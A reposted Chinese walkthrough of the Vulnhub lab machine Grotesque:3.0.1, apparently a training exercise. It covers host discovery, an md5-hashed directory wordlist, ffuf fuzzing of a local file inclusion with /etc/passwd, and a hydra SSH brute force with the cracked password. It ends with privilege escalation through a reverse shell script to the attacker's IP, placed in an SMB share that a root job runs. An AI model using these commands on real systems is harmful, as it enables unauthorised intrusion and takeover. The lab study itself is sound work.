看完这篇 教你玩转渗透测试靶机Vulnhub——Grotesque:3.0.1

news2025/2/28 17:02:30

Vulnhub靶机Grotesque:3.0.1渗透测试详解

    • Vulnhub靶机介绍:
    • Vulnhub靶机下载:
    • Vulnhub靶机安装:
        • ①:信息收集:
        • ②:漏洞发现:
        • ③:LFI漏洞利用(本地文件包含漏洞):
        • ④:SSH登入:
        • ⑤:提权:
        • ⑥:获取FLAG:
    • Vulnhub靶机渗透总结:

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:这个是Grotesque系列一共有3个靶机,分别是1.2.3老样子需要获得root权限找到flag

Difficulty:medium

Vulnhub靶机下载:

官网链接:https://download.vulnhub.com/grotesque/grotesque3.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。

在这里插入图片描述
在这里插入图片描述

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述
渗透机:kali IP :192.168.8.101 靶机IP :192.168.8.178

使用命令:nmap -sS -sV -n -T4 -p- 192.168.8.178

在这里插入图片描述

开启了22,80端口访问80,老样子扫描一下后台使用工具dirb,dirsearch,gobuster都没啥信息

在这里插入图片描述

这里看到一个超链接,点进去一张地图 既然后台扫不出那就换个思路找这个地图的信息 找到了md5

在这里插入图片描述

在这里插入图片描述

②:漏洞发现:

这里提示的是目录是md5加密的,所以需要生成一个加密的md5字典 使用命令:

for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dir.txt; done

然后需要把全部的 - 替换为 空格 然后在扫应该就能扫到目录了

在这里插入图片描述

 gobuster dir -u http://192.168.8.178 -w dir.txt -x php,html,txt,png,jpg,jpeg,css,js -b 403,404 -t 35 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.8.178
[+] Method:                  GET
[+] Threads:                 35
[+] Wordlist:                DIRMD5.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,png,jpg,jpeg,css,js,php,html
[+] Timeout:                 10s
===============================================================
2023/08/17 00:22:36 Starting gobuster in directory enumeration mode
===============================================================
/f66b22bf020334b04c7d0d3eb5010391.php (Status: 200) [Size: 0]
Progress: 1978235 / 1985049 (99.66%)
===============================================================
2023/09/20 23:00:00 Finished
===============================================================

扫到了f66b22bf020334b04c7d0d3eb5010391.php进行访问,发现空白页

尝试一下ffuf模糊探测 得到:purpose

 ffuf -c -u http://192.168.8.178/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=/etc/passwd -w /usr/share/wordlists/rockyou.txt -fs 0

在这里插入图片描述

③:LFI漏洞利用(本地文件包含漏洞):

这里检测一下 发现有个权限比较高得freddie用户 使用刚刚得md5字典进行爆破SSH密码

hydra -l freddie -P dirmd5.txt ssh://192.168.8.178 -t 20

在这里插入图片描述

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-20 23:22:34
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 220560 login tries (l:1/p:220560), ~13785 tries per task
[DATA] attacking ssh://192.168.1.49:22/
[STATUS] 142.00 tries/min, 142 tries in 00:01h, 220420 to do in 25:53h, 14 active
[STATUS] 98.67 tries/min, 296 tries in 00:03h, 220266 to do in 37:13h, 14 active
[STATUS] 92.29 tries/min, 646 tries in 00:07h, 219916 to do in 39:43h, 14 active
[STATUS] 2.39 tries/min, 675 tries in 04:42h, 219887 to do in 1535:47h, 14 active
[STATUS] 7.03 tries/min, 2101 tries in 04:58h, 218461 to do in 517:57h, 14 active
[22][ssh] host: 192.168.1.49   login: freddie   password: 61a4e3e60c063d1e472dd780f64e6cad
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-20 23:24:23

得到密码为:61a4e3e60c063d1e472dd780f64e6cad

④:SSH登入:
ssh freddie@192.168.8.178

在这里插入图片描述
先拿到个flag

在这里插入图片描述

⑤:提权:

又到了提权阶段了 sudo -lfind / -perm -u=s -type f 2>/dev/null 都没有可以利用的信息。

在这里插入图片描述
ss -tulpn 查看用户开放发那些端口这里发现 开启了445 SMB服务 文件共享

在这里插入图片描述
smbclient -L 127.0.0.1 登入发现了一个grotesque的文件,没有可以利用的信息。

在这里插入图片描述
在这里插入图片描述
这个时候可以上传一个pspy64 看看说不定有什么定时任务呢 🆗 我们继续信息收集一波!

pspy64下载:网上有很多,为了完美这里放个链接方便大家 直接下载

要先把这个pspy64传入靶机 先下载 然后 python3 -m http.server 6789 开启临时网页 wget下载

wget http://192.168.8.101:6789/pspy64s #下载
chmod 777  pspy64s  #赋予权限

在这里插入图片描述
在这里插入图片描述
发现 root用户在用bash这个命令去执行smbshare文件夹下面的sh文件
既然这样那我们是不是可以尝试写一个反弹shell 放到smb下面 过一会就会执行命令!

#!/bin/bash
sh -i >& /dev/tcp/192.168.8.101/1111 0>&1  # 记住是本机ip哈 别搞错了不然弹不上

在这里插入图片描述
再次登入 smbclient //127.0.0.1/grotesque 然后使用putshell.sh 传上去 需要等一下才会回弹

在这里插入图片描述

⑥:获取FLAG:

在这里插入图片描述
PS:又是一篇肝到凌晨的文章,希望以后回来看看都是回忆

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

1.信息收集 dirb,dirsearch,gobuster后台扫描工具(老生常谈 了)
2.for 生成MD5字典 (新知识点)
3.ffuf模糊探测,hydra爆破工具的使用,LFI漏洞利用
4.提权得信息收集,pspy64的使用,反弹sh的脚本编写 以及文件的上传下载 wgetput

Grotesque系列的最后一个靶机这个系列又完结啦,学习到了很多知识点又是收获满满的一天
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1026913.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

go语言初学(备忘)

1、安装 2 路径配置 C:\Program Files\Go\bin 3新建一个工程 4、下载VSCode 并安装插件 创建一个调试文件 在main目录下新建一个test.go脚本 package main import "fmt" func main() { fmt.Println("Hi 1111") fmt.Println("testasdf") } 断点…

【递归方式,流程回路检测】

背景:后置流程。例如:task1配置后置流程task2,task3。task3配置后置流程task4 问题:需要解决的问题配置时候防止回路,造成死循环:task1配置后置流程task2,task2配置后置流程task1 import jav…

Spring Cloud Gateway快速入门(二)——断言工厂

文章目录 前言1. 什么是Gateway断言工厂2. 为什么要使用断言2.1. 调试和开发:2.2. 防御性编程:2.3. 文档和可读性:2.4. 测试: 3. 常用的Gateway断言工厂3.1 Path断言工厂3.2 Method断言工厂3.3 Header断言工厂3.4 时间断言工厂 4.…

OpenHarmony应用程序包整体说明

用户应用程序泛指运行在设备的操作系统之上,为用户提供特定服务的程序,简称“应用”。一个应用所对应的软件包文件,称为“应用程序包”。 OpenHarmony提供了应用程序包开发、安装、查询、更新、卸载的管理机制,方便开发者开发和管…

C# PaddleDetection 安全帽检测

效果 项目 代码 using OpenCvSharp; using OpenCvSharp.Extensions; using Sdcb.PaddleDetection; using Sdcb.PaddleInference; using System; using System.Drawing; using System.Text; using System.Windows.Forms; using YamlDotNet; using static System.Windows.Forms…

jvm-sandbox-repeater源码解析-配置管理

一、配置初见 源码里提供的控制台截图如下:(怎么搭建自己去百度) 从中取出对应的配置如下: { "degrade": false, //阻断能力 "exceptionThreshold": 1000, //异常采样率 "httpEntrancePatterns&qu…

RuoYi-Vue 新增子module模块,接口报404

新建maven子模块 参考若依添加子模块 解决接口报404 官方用例没有父版本号 需要在ruoyi-admin加上父版本号

淘宝分布式文件存储系统( 三 ) -TFS

淘宝分布式文件存储系统( 三 ) ->>TFS 目录 : 文件重新映射的接口介绍文件映射 mmap_file.cpp的实现进行测试 文件重新映射 (增加 或者 减少 文件映射区域的大小) mremap() 函数的原型如下 #include <sys/mman.h> void *mremap( void * old_address , size_…

git 使用之撤销暂存区提交

有时候git add 不想要的文件,不想要继续commit了, 可以使用如下命令: git reset HEAD如下命令 比较工作区和暂存区差异,查询是否恢复成功 git diff --cached

【Vue+NodeJS】vue路由及NodeJS环境搭建(Windows版)

一、Vue路由 1、什么是Vue路由 Vue路由是Vue.js框架中用于实现单页面应用&#xff08;SPA&#xff09;的路由管理器。它允许您创建多个页面之间的导航&#xff0c;并通过URL的变化来动态加载不同的组件。Vue路由通过声明式的方式定义页面的导航规则&#xff0c;并提供了一些内置…

机器视觉Halcon中read_image算子探究与学习

目录 算子作用参数注意点算子 作用 读取图片,用于从硬盘上读取图像数据并将其加载到Halcon中进行进一步的显示,分析,处理。 参数 Image:输出参数,表示读取的图像数据。 FileName:输入参数,表示待读取的图像文件的路径和名称 注意点 FileName有相对路径和绝对路径…

K8S:pod集群调度及相关操作

文章目录 一.pod集群调度概念1.调度约束( List-Watch组件)2.List-Watch的工作机制&#xff08;1&#xff09;List-Watch的工作机制流程&#xff08;2&#xff09;List-Watch的工作机制图示 3.调度的过程&#xff08;1&#xff09;调度的任务&#xff08;2&#xff09;调度选择p…

如何选择适合爬虫的动态住宅套餐

在当今互联网时代&#xff0c;爬虫已经成为了一项非常重要的技术。爬虫技术可以帮助企业和个人获取大量的数据&#xff0c;从而进行数据分析和决策。但是&#xff0c;要想让爬虫技术发挥最大的作用&#xff0c;就需要选择一款动态住宅套餐。那么&#xff0c;在选择动态住宅套餐…

vue内置组件Transition的详解

1. Transition定义 Vue 提供了两个内置组件&#xff0c;可以帮助你制作基于状态变化的过渡和动画&#xff1a; <Transition>会在一个元素或组件进入和离开 DOM 时应用动画。 <TransitionGroup> 会在一个 v-for 列表中的元素或组件被插入&#xff0c;移动&#xff0…

第七章 查找 五、二叉排序树

目录 一、定义 二、代码实现 1、查找 2、插入 3、构造 4、删除 三、查找效率分析 1、查找成功ASL 2、查找失败ASL 四、总结 一、定义 二叉排序树&#xff08;Binary Search Tree&#xff0c;BST&#xff09;是一种特殊的二叉树&#xff0c;它满足以下条件&#xff1a…

计算机竞赛 深度学习 机器视觉 车位识别车道线检测 - python opencv

0 前言 &#x1f525; 优质竞赛项目系列&#xff0c;今天要分享的是 &#x1f6a9; 深度学习 机器视觉 车位识别车道线检测 该项目较为新颖&#xff0c;适合作为竞赛课题方向&#xff0c;学长非常推荐&#xff01; &#x1f947;学长这里给一个题目综合评分(每项满分5分) …

通讯网关软件007——利用CommGate X2Mbt实现Modbus TCP访问MSSQL服务器

本文介绍利用CommGate X2Mbt实现Modbus TCP访问MS SQL数据库。CommGate X2MBT是宁波科安网信开发的网关软件&#xff0c;软件可以登录到网信智汇(wangxinzhihui.com)下载。 【案例】如下图所示&#xff0c;实现上位机通过Modbus TCP来获取MS SQL数据库的数据。 【解决方案】设…

查看linux是centos还是Ubuntu

查看linux是centos还是Ubuntu 命令&#xff1a;cat /etc/os-release

【操作系统笔记】任务调度信号处理CPU上下文

任务调度 何时需要调度执行一个任务&#xff1f; 第一&#xff1a;当任务创建的时候&#xff0c;需要决定是继续执行父进程&#xff0c;还是调度执行子进程 第二&#xff1a;在一个任务退出时&#xff0c;需要做出调度决策&#xff0c;需要从 TASK_RUNNING 状态的所有任务中选…

java Spring Boot验证码美化,白色背景 随机四个数 每个字随机颜色

我前文 Spring Boot2.7生成用于登录的图片验证码讲述了生成验证码的方法 但是这样生成验证码 非常难看 比较说 验证码是要展示到web程序中的 这样让用户看着 属实不太好 我们可以将接口改成 GetMapping(value "/captcha", produces MediaType.IMAGE_PNG_VALUE) …